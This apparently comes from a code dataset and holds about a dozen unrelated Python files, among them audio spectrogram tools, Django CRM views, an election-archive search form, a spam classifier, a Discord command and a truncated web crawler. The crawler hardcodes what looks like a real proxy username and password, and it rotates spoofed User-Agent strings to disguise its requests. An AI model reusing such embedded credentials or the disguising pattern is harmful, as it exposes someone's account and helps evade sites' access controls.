true_coordinates = defaultdict(list)\n match_table = pd.read_csv(table)\n for i, row in match_table.iterrows():\n h = row[\"h\"]\n x, y, z, d = row[\"x\"], row[\"y\"], row[\"z\"], row[\"d\"]\n true_coordinates[h].append([x,y,z,d])\n else:\n truth = [x for x in fns if \"true\" in x.split(\"/\")[-1]]\n true_coordinates = defaultdict(list)\n for fn in truth:\n with open(fn, \"r\") as fid:\n for line in fid.readlines():\n h, x, y, z, d = list(map(int, line.split(\" \")))\n true_coordinates[h].append([x, y, z, d])\n else:\n true_coordinates = None\n\n# # Round 1 \n# coors_table, df_table = create_table(\n# distance_threshold=10.0*scale_x,\n# true_coordinates=true_coordinates,\n# pred_coordinates=pred_coordinates,\n# match=match\n# )\n# df_table = pd.DataFrame.from_dict(df_table)\n \n# # Round 2\n# dff = {}\n# for h in df_table[\"h\"].unique():\n# c = (df_table[\"h\"] == h)\n# dff[h] = df_table[c][[\"x_p\", \"y_p\", \"z_p\", \"d_p\"]].values\n \n# coors_table, df_table = create_table(\n# distance_threshold=distance_threshold,\n# true_coordinates=true_coordinates,\n# pred_coordinates=dff,\n# match=match\n# )\n \n coors_table, df_table = create_table(\n distance_threshold=distance_threshold,\n true_coordinates=true_coordinates,\n pred_coordinates=pred_coordinates,\n match=match\n )\n\n \"\"\"Save the table as a dictionary\"\"\"\n save_fn = os.path.join(save_loc, inf_save_loc,\n f\"prediction_table_{str(distance_threshold)}.pkl\")\n with open(save_fn, \"wb\") as fid:\n joblib.dump(coors_table, fid)\n\n \"\"\"Save the table to csv\"\"\"\n df_table = pd.DataFrame.from_dict(df_table)\n df_table.to_csv(os.path.join(\n save_loc, inf_save_loc, f\"prediction_table_{str(distance_threshold)}.csv\"))\n","sub_path":"applications/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":19549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"432046435","text":"from onegov.election_day.models import ArchivedResult\nfrom onegov.form import Form\nfrom onegov.form.fields import MultiCheckboxField\nfrom wtforms.fields.html5 import DateField\nfrom wtforms import StringField\nfrom onegov.election_day import _\n\n\nclass ArchiveSearchForm(Form):\n\n term = StringField(\n label=_(\"Text Retrieval\"),\n render_kw={'size': 4, 'clear': True},\n description=_(\n \"Searches the title of the election/vote. \"\n \"Use Wilcards (*) to find more results, e.g Nationalrat*.\"\n ),\n )\n\n from_date = DateField(\n label=_(\"From date\"),\n render_kw={'size': 4}\n )\n\n to_date = DateField(\n label=_(\"To date\"),\n render_kw={'size': 4, 'clear': False}\n )\n\n answers = MultiCheckboxField(\n label=_(\"Voting result\"),\n choices=ArchivedResult.types_of_answers,\n render_kw={'size': 4}\n )\n\n # Is always hidden since item_type in url will filter the types\n types = MultiCheckboxField(\n label=_(\"Type\"),\n render_kw={'size': 4, 'clear': False, 'hidden': True},\n choices=ArchivedResult.types_of_results,\n description=_(\n \"Compound of elections field summarizes all related elections\"\n \" in one. To display all elections,\"\n \" uncheck 'Compound of Elections'\")\n )\n\n domains = MultiCheckboxField(\n label=_(\"Domain\"),\n render_kw={'size': 8, 'clear': False},\n choices=ArchivedResult.types_of_domains\n )\n\n def on_request(self):\n # Roves crf token from query params\n if hasattr(self, 'csrf_token'):\n self.delete_field('csrf_token')\n\n def select_all(self, name):\n field = getattr(self, name)\n if not field.data:\n field.data = list(next(zip(*field.choices)))\n\n def toggle_hidden_fields(self, model):\n \"\"\" Hides answers field for election view and move the field to\n the right side with render_kw. \"\"\"\n if model.item_type in ('election', 'election_compound'):\n self.answers.render_kw['hidden'] = True\n self.domains.render_kw['size'] = 12\n else:\n self.domains.render_kw['size'] = 8\n self.answers.render_kw['hidden'] = False\n\n def apply_model(self, model):\n\n self.term.data = model.term\n self.from_date.data = model.from_date\n self.to_date.data = model.to_date\n self.answers.data = model.answers\n self.types.data = model.types\n self.domains.data = model.domains\n\n self.select_all('domains')\n self.select_all('types')\n self.select_all('answers')\n self.toggle_hidden_fields(model)\n","sub_path":"src/onegov/election_day/forms/archive.py","file_name":"archive.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"291829041","text":"\"\"\"Create downsampled spectrograms from a (possibly sampled) wav file\n\nusage: reconstruct_npy.py \n\noptions:\n -h, --help Show this help message and exit\n\"\"\"\nfrom kkpthlib.datasets.speech.audio_processing.audio_tools import herz_to_mel, mel_to_herz\nfrom kkpthlib.datasets.speech.audio_processing.audio_tools import stft, istft\nfrom kkpthlib.utils import split\nfrom kkpthlib.utils import split_np\nfrom kkpthlib.utils import interleave_np\nfrom kkpthlib.utils import interleave\nfrom docopt import docopt\nfrom scipy.io import wavfile\nfrom scipy import signal\nfrom shutil import copyfile\nimport os\nimport numpy as np\nimport matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\n\ndef melspectrogram_preprocess(data, sample_rate):\n # takes in a raw sequence scaled between -1 and 1 (such as loaded from a wav file)\n\n # 'Center freqs' of mel bands - uniformly spaced between limits\n x = data\n sr = sample_rate\n\n # hardcode these values...\n n_mels = 256\n\n mel_freq_min = 125\n mel_freq_max = 7600\n\n stft_size = 6 * 256\n stft_step = 256\n\n n_fft = stft_size\n n_step = stft_step\n fmin = mel_freq_min\n fmax = mel_freq_max\n\n # preemphasis filter\n preemphasis_coef = 0.97\n ref_level_db = 20\n min_level_db = -90\n\n # preemphasis filter\n coef = preemphasis_coef\n b = np.array([1.0, -coef], x.dtype)\n a = np.array([1.0], x.dtype)\n preemphasis_filtered = signal.lfilter(b, a, x)\n\n # mel weights\n # nfft - 1 because onesided=False cuts off last bin\n weights = np.zeros((n_mels, n_fft - 1), dtype=\"float32\")\n\n fftfreqs = np.linspace(0, float(sr) / 2., n_fft - 1, endpoint=True)\n\n min_mel = herz_to_mel(fmin)\n max_mel = herz_to_mel(fmax)\n mels = np.linspace(min_mel, max_mel, n_mels + 2)\n mel_f = mel_to_herz(mels)[:, 0]\n\n fdiff = np.diff(mel_f)\n ramps = np.subtract.outer(mel_f, fftfreqs)\n\n for i in range(n_mels):\n # lower and upper slopes for all bins\n lower = -ramps[i] / float(fdiff[i])\n upper = ramps[i + 2] / float(fdiff[i + 1])\n\n # .. then intersect them with each other and zero\n weights[i] = np.maximum(0., np.minimum(lower, upper))\n # slaney style norm\n enorm = 2.0 / (mel_f[2 : n_mels + 2] - mel_f[:n_mels])\n weights *= enorm[:, np.newaxis]\n mel_weights = weights\n\n # do stft\n ref_level_db = ref_level_db\n min_level_db = min_level_db\n def _amp_to_db(a):\n min_level = np.exp(min_level_db / 20. * np.log(10))\n return 20 * np.log10(np.maximum(min_level, a))\n\n # ONE SIDED MUST BE FALSE!!!!!!!!\n abs_stft = np.abs(stft(preemphasis_filtered, fftsize=n_fft, step=n_step, real=True, compute_onesided=False))\n melspec_ref = _amp_to_db(np.dot(mel_weights, abs_stft.T)) - ref_level_db\n melspec_clip = np.clip((melspec_ref - min_level_db) / -min_level_db, 0, 1)\n return melspec_clip.T\n\nif __name__==\"__main__\":\n args = docopt(__doc__)\n wav_file = args[\"\"]\n\n fs, d = wavfile.read(wav_file)\n # put it between -1 and 1\n d = d.astype(\"float32\") / (2 ** 15)\n mel = melspectrogram_preprocess(d, fs)\n max_frame_count = mel.shape[0]\n # pad to even multiple of 2, 4, 8\n divisors = [2, 4, 8]\n for di in divisors:\n # nearest divisble number above, works because largest divisor divides by smaller\n # we need something that has a length in time (frames) divisible by 2 4 and 8 due to the nature of melnet\n # same for frequency but frequency is a power of 2 so no need to check it\n q = int(max_frame_count / di)\n if float(max_frame_count / di) == int(max_frame_count / di):\n max_frame_count = di * q\n else:\n max_frame_count = di * (q + 1)\n new_mel = np.zeros((max_frame_count, mel.shape[1])).astype(mel.dtype)\n new_mel[:len(mel)] = mel\n mel = new_mel\n\n input_axis_split_list = [2, 1, 2, 1, 2]\n\n all_x_splits = []\n x_t = mel[None, ..., None]\n all_x_splits.append((x_t, x_t))\n for aa in input_axis_split_list:\n all_x_splits.append(split_np(x_t, axis=aa))\n x_t = all_x_splits[-1][0]\n # out, split 1 time, split 2 times, etc... down to the smallest split\n base_folder = \"deconstructed/\"\n if not os.path.exists(base_folder):\n os.mkdir(base_folder)\n copyfile(wav_file, base_folder + wav_file.split(\"/\")[-1])\n\n plt.plot(d)\n plt.savefig(base_folder + wav_file.split(\"/\")[-1].split(\".\")[0] + \".png\")\n plt.close()\n\n for _n in range(len(all_x_splits)):\n if _n == (len(all_x_splits) - 1):\n fname_base = \"output_unnormalized_samples\"\n else:\n fname_base = \"tier{}_{}_unnormalized_samples\"\n\n this_mel_split = all_x_splits[::-1][_n][0]\n np.save(base_folder + fname_base.format(_n, 0) + \".npy\", this_mel_split)\n\n plt.imshow(this_mel_split[0, ..., 0])\n plt.title(wav_file.split(\"/\")[-1])\n plt.savefig(base_folder + fname_base.format(_n, 0) + \".png\")\n plt.close()\n\n plt.imshow(this_mel_split[0, ..., 0].T)\n plt.gca().invert_yaxis()\n plt.title(wav_file.split(\"/\")[-1])\n plt.savefig(base_folder + fname_base.format(_n, 0) + \"_flip.png\")\n plt.close()\n\n\n this_mel_split = all_x_splits[::-1][_n][1]\n np.save(base_folder + fname_base.format(_n, 1) + \".npy\", this_mel_split)\n\n plt.imshow(this_mel_split[0, ..., 0])\n plt.title(wav_file.split(\"/\")[-1])\n plt.savefig(base_folder + fname_base.format(_n, 1) + \".png\")\n plt.close()\n\n plt.imshow(this_mel_split[0, ..., 0].T)\n plt.gca().invert_yaxis()\n plt.title(wav_file.split(\"/\")[-1])\n plt.savefig(base_folder + fname_base.format(_n, 1) + \"_flip.png\")\n plt.close()\n","sub_path":"examples/attention_melnet_cmdline/deconstruct_wav.py","file_name":"deconstruct_wav.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"317644557","text":"import iris\nimport sys\n\nsys.path.append('/home/michael/Desktop/git/Masters/SST_daily')\nimport make_cube_SST\n\n'''\nIn the following scrip, we calculate the carbon fluxes from this equation:\n\nCarbon Flux = constant * (windspeed)**2 * [(partial pressure of disolved CO2) - (partial pressure of atmospheric CO2)]\n\n\nFor the purposes of this rough calculation, we have;\n\nignored the effect of advection\nignored the dependance on solubility as this is assumed to be small\nassumed the gas transfer velocity to be proportional to windspeed squared\n\nWe shall also;\n\nset constant = 1,\nassume the the partial pressure of atmospheric CO2 is constant and equal to 35.5 Pa\nwe assume the variation in disolved CO2 is due to temperature alone, and follows\n\nd(pCO2)/dT = 0.0423(pCO2)\n\nleading to (pCO2) = A * exp(0.0423*T)\n\nTaking zero flux at 300K gives A = 0.000096\n\n'''\n\nSST_cubes = iris.load('/home/michael/Desktop/git/Masters/SST_daily/ersst.201201.nc')\n# Wspd_cubes = iris.load('/home/michael/Desktop/git/Masters/Wspd_daily/Wspd_cubes.nc')\n\nSST = SST_cubes[0]\nSST.convert_units('kelvin')\nWind = 5\n\n# Wind.units = None\n\ngas_transfer_velocity = 0.31*Wind**2 - 0.91*Wind + 7.76\n\ncarbon_flux = 0.328 * (0.0001 * iris.analysis.maths.exp(0.0423 * SST) - 35.5)\ncarbon_flux.rename('carbon_flux')\n# carbon_flux.units = 'mol m-2 yr-1'\n\n# mean_carbon_flux = carbon_flux.collapsed('time', iris.analysis.MEAN)\n# mean_carbon_flux.rename('mean_carbon_flux')\n\n# carbon_flux_anomoly = make_cube_SST.convert_to_anomoly(carbon_flux.data, 0, 0)\n\nall_cubes = (carbon_flux, SST)\n\niris.save(all_cubes, 'carbon_flux_global.nc')","sub_path":"Carbon_Fluxes/carbon_fluxes_global.py","file_name":"carbon_fluxes_global.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"159443343","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom django.db.models import Q,F\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\nfrom crm import formvaild\nfrom crm import models\nimport json\nfrom django.views import View\nimport datetime,time\n\nclass DateEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj,datetime.datetime):\n return obj.strftime(\"%Y-%m-%d %H:%M:%S\")\n else:\n return json.JSONEncoder.default(self,obj)\ndef home(request):\n return render(request,'crm/index.html',{'title':'index'})\n\n\nclass Conditions:\n @staticmethod\n def orderListQ(lst):\n con = Q()\n # lst = [{\"key1\":[]},{\"key2\":[]},{\"key3\":[]}]\n for i in lst:\n q = Q()\n if i[0] == \"addtime\" or i[0] == \"ordervalue\" or i[0] == \"arrears\":\n q.connector = \"AND\"\n q.children.append((i[0] + \"__gte\", i[1][0]))\n q.children.append((i[0] + \"__lte\", i[1][1]))\n else:\n q.connector = \"OR\"\n for j in i[1]:\n q.children.append((i[0], j))\n con.add(q, \"AND\")\n return con\ndef initdata(req):\n resp = \"ok\"\n try:\n models.initData()\n except Exception as e:\n resp = e.__str__()\n return HttpResponse(resp)\ndef createorder(req):\n if req.method == \"GET\":\n form_obj = formvaild.CustomerOrderForm()\n order_list = formvaild.OrderListForm()\n factory_select = formvaild.FactorySelectForm()\n # time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n return render(req, \"crm/createorder.html\", {\"formObj\": form_obj, \"orderList\": order_list,\"factory_select\":factory_select})\n formObj = formvaild.CustomerOrderForm(req.POST)\n resp = {\"msg\": \"\", \"status\": \"ok\", \"err\": formObj.errors}\n if formObj.is_valid():\n print(formObj.cleaned_data)\n orderNum = formObj.cleaned_data[\"ordernum\"]\n orderList = json.loads(req.POST.get(\"orderList\"))\n try:\n models.CustomerOrder.objects.create(**formObj.cleaned_data)\n li = list(map(lambda x: models.OrderList(order_id=orderNum, pm_id=x[\"pm_id\"], productnum=x[\"productnum\"]),\n orderList))\n models.OrderList.objects.bulk_create(li)\n updateStock(orderList,\"minus\")\n except Exception as e:\n print(e)\n resp[\"msg\"] = e.__str__()\n resp[\"status\"] = \"err\"\n else:\n resp[\"status\"] = \"err\"\n print(resp)\n return HttpResponse(json.dumps(resp))\n\ndef getSelect(req):\n if req.method == \"POST\":\n key = req.POST.get(\"key\")\n if key == \"ocn__name\":\n data = models.Customer.objects.all().values(\"id\", \"name\")\n return HttpResponse(json.dumps({\"data\":list(data)}))\n elif key == \"on__name\":\n data = models.CustomerOrderType.objects.all().values(\"id\", \"name\")\n return HttpResponse(json.dumps({\"data\":list(data)}))\n elif key == \"os__name\":\n data = models.OrderStatus.objects.all().values(\"id\", \"name\")\n return HttpResponse(json.dumps({\"data\":list(data)}))\n elif key == \"ocn__ct__name\":\n data = models.CustomerType.objects.all().values(\"id\", \"name\")\n return HttpResponse(json.dumps({\"data\":list(data)}))\n\ndef orderListDetail(req):\n colsMap = {\n \"pm__model\": \"产品型号\",\n \"pm__value\": \"产品单价\",\n \"productnum\": \"产品数量\",\n }\n orderNum = req.POST.get(\"orderNum\")\n print(req.POST)\n ret = models.OrderList.objects.filter(order_id=orderNum).select_related(\"pm_id\").values(\"pm__model\",\"pm__value\",\"productnum\")\n print(ret.query)\n print(list(ret))\n return HttpResponse(json.dumps({\"data\":list(ret),\"tablehead\":colsMap}))\n\nclass Orderlist(View):\n colsMap = {\n \"ordernum\": \"订单号\",\n \"ordervalue\": \"订单总金额\",\n \"arrears\": \"订单欠款\",\n \"addtime\":\"下单时间\",\n \"ocn__name\": \"客户\",\n \"ocn__ct__name\": \"客户类型\",\n \"on__name\": \"订单类型\",\n \"os__name\": \"订单状态\",\n \"comment\": \"备注\",\n }\n\n def get(self,req):\n return render(req,\"crm/orderlist.html\",{\"selectOptions\": self.colsMap})\n\n def paser(self,x):\n tmp = x[0]\n if \"__name\" in x[0]:\n tmp = x[0].replace(\"_name\", \"id\")\n elif \"comment\" == x[0]:\n tmp = x[0]+\"__contains\"\n return (tmp,x[1])\n\n def post(self,req):\n obj = req.POST.get(\"data\")\n pn = req.POST.get(\"pn\")\n page_number = req.POST.get(\"page_number\")\n obj = json.loads(obj)\n obj = list(map(lambda x:self.paser(x),obj.items()))\n ret = models.CustomerOrder.objects.filter(Conditions.orderListQ(obj)).select_related(\"on_id\",\"os_id\",\"ocn_id\").values(\n *self.colsMap.keys())\n p = Paginator(list(ret), page_number)\n # print(ret.query)\n return HttpResponse(json.dumps({\n \"data\":p.page(pn).object_list,\n \"page_range\":[p.page_range.start,p.page_range.stop],\n \"total_page\":p.num_pages,\n \"tablehead\":self.colsMap},cls=DateEncoder))\n\ndef stocklist(req):\n if req.method == \"GET\":\n data = models.Stock.objects.all()\n return render(req, \"crm/stocklist.html\", {\"data\": data})\n\nclass Storage(View):\n def get(self,req):\n stock_list = formvaild.StorageForm()\n all = models.Stock.objects.select_related(\"pm_id\",\"pm__fn_id\").all().values(\"pm__model\",\"number\",\"pm__fn__name\")\n print(list(all))\n return render(req, \"crm/storage.html\", {\"stock_list\": list(all)})\n\n def post(self,req):\n return HttpResponse(\"post\")\n\nclass Customer(View):\n def get(self,req):\n formObj = formvaild.CustomerForm()\n return render(req, \"crm/customer.html\", {\"formobj\": formObj})\n\n def post(self,req):\n return HttpResponse(\"post\")\n\nclass CreatePurchaseOrder(View):\n @staticmethod\n def addProduct(req):\n fn_id = req.POST.get(\"fn_id\")\n ret= models.ProductModel.objects.filter(fn_id=fn_id).values()\n return HttpResponse(json.dumps({\"pms\":list(ret)}))\n\n def get(self,req):\n form_obj = formvaild.PurchaseOrderForm()\n order_list = formvaild.OrderListForm()\n # return render(req, \"crm/createpurchaseorder.html\", {\"formObj\": form_obj, \"orderList\": order_list}) order_list = formvaild.OrderListForm()\n return render(req, \"crm/createpurchaseorder.html\", {\"formObj\": form_obj})\n\n def post(self,req):\n formObj = formvaild.PurchaseOrderForm(req.POST)\n resp = {\"msg\": \"\", \"status\": \"ok\", \"err\": formObj.errors}\n if formObj.is_valid():\n print(formObj.cleaned_data)\n orderNum = formObj.cleaned_data[\"ordernum\"]\n orderList = json.loads(req.POST.get(\"orderList\"))\n try:\n models.PurchaseOrder.objects.create(**formObj.cleaned_data)\n li = list(\n map(lambda x: models.PurchaseOrderList(order_id=orderNum, pm_id=x[\"pm_id\"], productnum=x[\"productnum\"]),\n orderList))\n models.PurchaseOrderList.objects.bulk_create(li)\n updateStock(orderList,\"add\")\n except Exception as e:\n print(e)\n resp[\"msg\"] = e.__str__()\n resp[\"status\"] = \"err\"\n else:\n resp[\"status\"] = \"err\"\n print(resp)\n return HttpResponse(json.dumps(resp))\n\ndef updateStock(pmlist,opt):\n for one in pmlist:\n pm_id = one[\"pm_id\"]\n number = one[\"productnum\"]\n o = models.Stock.objects.filter(pm_id=pm_id)\n if o.exists():\n if opt == \"add\":\n o.update(number=F(\"number\") + number)\n else:\n o.update(number=F(\"number\") - number)\n else:\n models.Stock.objects.create(pm_id=pm_id, number=number)\n\nclass Ajax:\n @staticmethod\n def checkStock(req):\n data = req.POST.get(\"data\")\n li = json.loads(data)[\"list\"]\n dic = {}\n for i in li:\n pm_id = i[\"pm_id\"]\n number = int(i[\"productnum\"])\n if dic.get(pm_id):\n dic[pm_id] = dic[pm_id] + number\n else:\n dic[pm_id] = number\n ret = {\"msg\": \"\",\"status\":\"ok\"}\n for i,n in dic.items():\n o = models.Stock.objects.filter(pm_id=i).values(\"number\",\"pm__model\").first()\n if o[\"number\"] < n:\n ret[\"status\"] = \"err\"\n ret[\"msg\"]+=\"%s 库存数量%d 少于订单数量%s\"%(o[\"pm__model\"],o[\"number\"],dic[i])\n print(ret)\n return HttpResponse(json.dumps(ret))","sub_path":"crm/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"170671809","text":"import pickle\n\nfrom nose.tools import assert_not_equal, eq_, raises\n\nfrom ...dependencies import solve\nfrom ...dependencies.errors import DependencyError\nfrom ..language import Language, LanguageUtility, is_badword, is_stopword\n\n\ndef process_is_badword():\n def is_badword(word):\n return word == \"badword\"\n return is_badword\n\nmy_is_badword = LanguageUtility(\"is_badword\", process_is_badword)\n\ndef test_language_utility():\n eq_(is_badword == is_badword, True)\n eq_(is_badword != is_badword, False)\n\n\ndef test_language():\n\n l = Language('revscoring.languages.test', [my_is_badword])\n\n assert is_badword in l.context\n eq_(l.context[is_badword]()(\"badword\"), True)\n\n recovered_l = pickle.loads(pickle.dumps(l))\n eq_(recovered_l, l)\n eq_(l == 5678, False)\n eq_(l != 5678, True)\n recovered_context = recovered_l.context\n\n assert is_badword in recovered_context\n eq_(recovered_context[is_badword]()(\"badword\"), True)\n\n@raises(DependencyError)\ndef test_not_implemented():\n\n l = Language('revscoring.languages.test', [])\n solve(is_stopword, context=l.context)\n\ndef test_from_config_module():\n config = {\n 'languages': {\n 'english': {\n 'module': \"revscoring.languages.english\"\n }\n }\n }\n\n english = Language.from_config(config, 'english')\n english.solve(is_badword)\n\n@raises(RuntimeError)\ndef test_from_config_class():\n config = {\n 'languages': {\n 'english': {\n 'class': \"revscoring.languages.Language\",\n 'param': \"Some param\"\n }\n }\n }\n\n english = Language.from_config(config, 'english')\n","sub_path":"revscoring/languages/tests/test_language.py","file_name":"test_language.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"314351690","text":"import os\nimport time\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split as tts\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef main():\n if not(os.path.exists(\"/home/xvpher/PythonML/MLCodes/Spambase/Dataset/spamdata.csv\")):\n print(\"Could not find the data file\")\n return\n df = pd.read_csv(\"/home/xvpher/PythonML/MLCodes/Spambase/Dataset/spamdata.csv\")\n features = df.iloc[:,0:57].values\n labels = df.iloc[:,57].values\n scaler = StandardScaler()\n features = scaler.fit_transform(features)\n X_train, X_test, y_train, y_test = tts(features, labels, test_size=0.25, shuffle=True, random_state=8)\n model = tf.keras.models.Sequential()\n model.add(tf.keras.layers.Dense(32,activation='relu',input_dim=57,kernel_initializer='random_normal'))\n model.add(tf.keras.layers.Dense(32,activation='relu',kernel_initializer='random_normal'))\n model.add(tf.keras.layers.Dense(1,activation='sigmoid',kernel_initializer='random_normal'))\n model.compile(optimizer='adam',loss='binary_crossentropy',metrics=['accuracy'])\n model.fit(X_train,y_train,batch_size=10,epochs=50)\n model.save(\"Neural_Network.model\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Neural Network/Neural_Classifier.py","file_name":"Neural_Classifier.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"565232475","text":"\"\"\"\n1215. [S/W 문제해결 기본] 3일차 - 회문1\n\n\"기러기\" 또는 \"level\" 과 같이 거꾸로 읽어도 앞에서부터 읽은 것과 같은 문장이나 낱말을 회문(回文, palindrome)이라 한다.\n\n주어진 8x8 평면 글자판에서 가로, 세로를 모두 보아 제시된 길이를 가진 회문의 총 개수를 구하는 문제이다.\n\n위와 같은 글자판이 주어졌을 때, 길이가 5인 회문은 붉은색 테두리로 표시된 4개가 있으며 따라서 4를 반환하면 된다.\n\n\n[제약 사항]\n\n각 칸의 들어가는 글자는 c언어 char type으로 주어지며 'A', 'B', 'C' 중 하나이다.\n\n글자 판은 무조건 정사각형으로 주어진다.\n\nABA도 회문이며, ABBA도 회문이다. A또한 길이 1짜리 회문이다.\n\n가로, 세로 각각에 대해서 직선으로만 판단한다.\n\n즉, 아래 예에서 노란색 경로를 따라가면 길이 7짜리 회문이 되지만 직선이 아니기 때문에 인정되지 않는다.\n\n\n[입력]\n\n각 테스트 케이스의 첫 번째 줄에는 찾아야 하는 회문의 길이가 주어지며, 다음 줄에 테스트 케이스가 주어진다.\n\n총 10개의 테스트 케이스가 주어진다.\n\n\n[출력]\n\n#부호와 함께 테스트 케이스의 번호를 출력하고, 공백 문자 후 찾은 회문의 개수를 출력한다.\n\n\"\"\"\nimport sys\nsys.stdin = open('input.txt','r')\n\ndef rotateMatrix(matrix):\n N = len(matrix)\n new_matrix = [[None]*N for _ in range(N)]\n i = j = 0\n\n # 축 회전\n for x in range(N-1,-1,-1):\n for y in range(N):\n new_matrix[x][y] = matrix[j][i]\n j += 1\n j = 0\n i += 1\n\n res = [None] * N\n for i in range(N):\n temp = \"\"\n for j in range(N):\n temp += new_matrix[i][j]\n res[i] = temp\n return res\n\ndef isPalindrome(string):\n n = len(string)\n for i in range(len(string)//2):\n if string[i] != string[n-i-1]:\n return False\n return True\n\ndef findPalindrome(matrix,n):\n count = 0\n for m in matrix:\n for i in range(9-n):\n if isPalindrome(m[i:n+i]):\n count += 1\n\n r_matrix = rotateMatrix(matrix)\n for m in r_matrix:\n for i in range(9-n):\n if isPalindrome(m[i:n+i]):\n count += 1\n return count\n\nfor t in range(1,11):\n n = int(input())\n matrix = [input() for _ in range(8)]\n res = findPalindrome(matrix,n)\n print(f\"#{t} {res}\")\n","sub_path":"OnlineJudge/SWExpertAcademy/Problem/D3/1215.py","file_name":"1215.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"144135786","text":"\"\"\"update Post\n\nRevision ID: ae9387586fdf\nRevises: b2bd5e75eb40\nCreate Date: 2017-03-31 11:36:42.009322\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ae9387586fdf'\ndown_revision = 'b2bd5e75eb40'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('posts', sa.Column('img', sa.String(length=255), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('posts', 'img')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/ae9387586fdf_update_post.py","file_name":"ae9387586fdf_update_post.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"307762720","text":"from policy import AccessControl\nfrom discord import Client, Message\nfrom management import check_category\n\nSHORT_HELP_TEXT = '$$$category [categoria] - Altera a categoria em que são criados novos canais'\n\ndef help(**kwargs) -> str:\n \"\"\"\n Show help\n \"\"\"\n return SHORT_HELP_TEXT\n\n@AccessControl(roles=['Staff'], relax_pm=True)\nasync def run(client: Client, message: Message, **kwargs) -> None:\n await check_category(kwargs[\"args\"][0])\n await message.channel.send(content=\"Feito\")\n","sub_path":"hooks/commands/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52764075","text":"import urllib.request\nimport urllib.parse\nimport urllib\nimport random\nimport chardet\nfrom bs4 import BeautifulSoup\nimport re\ncrawlerUrl1=\"https://news.qq.com/a/20180312/035287.htm\"\ncrawlerUrl2=\"http://www.baidu.com/\"\ncrawlerUrl3=\"http://10.137.55.248:8090/\"\ncrawlerUrl4=\"https://hanyu.baidu.com/zici/s?wd=%E9%BE%9C\"\n\n\n#页面编码\nencoding=\"ut-8\"\n\npostBody=urllib.parse.urlencode({\n \"name\":\"name\",\n \"pass\":\"pass\"\n }).encode(\"utf-8\")\n\n\nproxy_list = [\n {\"http\":\"fwx377318:fj3224390@@127.0.0.1:8080\"}\n]\n\nUSER_AGENTS = [\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)\",\n \"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)\",\n \"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0\",\n \"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5\"\n]\n\n\n# 随机选择一个代理并设置\nproxyDic = random.choice(proxy_list)\n#获取User_Agent设置���求头\nuser_agent = random.choice(USER_AGENTS)\n\n\n\n\n\n#设置代理\n# proxy=urllib.request.ProxyHandler(proxyDic)\n# opener=urllib.request.build_opener(proxy,urllib.request.HTTPHandler)\n# urllib.request.install_opener(opener)\n\n\n# 构建请求\nreq=urllib.request.Request(crawlerUrl4)\nreq.add_header(\"User-Agent\",user_agent)\n#req.add_header(\"Cookie\",\"BAIDUID=D8F571E0C0FBBF8578920341274B5E49:FG=1; BIDUPSID=D8F571E0C0FBBF8578920341274B5E49; PSTM=1515860626; BD_UPN=12314753; 